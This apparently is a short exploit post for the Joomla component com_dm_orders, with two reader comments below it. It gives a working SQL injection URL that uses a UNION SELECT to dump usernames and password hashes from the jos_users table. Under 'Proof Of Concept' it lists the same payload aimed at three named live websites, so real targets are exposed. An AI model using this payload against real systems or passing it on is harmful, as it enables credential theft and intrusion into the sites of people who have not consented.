Joomla Components [ com_dm_orders ] SQL Injection Vuln

[o] com_dm_orders SQL Vulnerability
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/



[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54

2 Responses so far.

  1. Anonymous says:

    I've been using greensql for a while and all my joomla customers are satisfied, www.greensql.net

  2. NoGe says:

    what do you mean by that?